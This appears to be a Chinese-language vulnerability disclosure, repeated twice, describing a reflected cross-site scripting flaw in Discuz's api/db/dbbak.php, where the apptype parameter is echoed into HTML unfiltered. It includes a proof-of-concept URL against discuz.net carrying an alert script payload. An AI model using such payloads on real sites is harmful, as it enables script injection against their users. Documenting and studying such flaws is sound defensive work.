VULHUB ™

### 简要描述： 页面对取到的参数没有过滤，直接echo到了html里。 ### 详细说明： api/db/dbbak.php页面，对$apptype缺少必要的过滤，调用api_msg()函数时直接将$apptype echo到了html中。 ### 漏洞证明： http://www.discuz.net/api/db/dbbak.php?apptype=1%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3C%22

### 简要描述： 页面对取到的参数没有过滤，直接echo到了html里。 ### 详细说明： api/db/dbbak.php页面，对$apptype缺少必要的过滤，调用api_msg()函数时直接将$apptype echo到了html中。 ### 漏洞证明： http://www.discuz.net/api/db/dbbak.php?apptype=1%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3C%22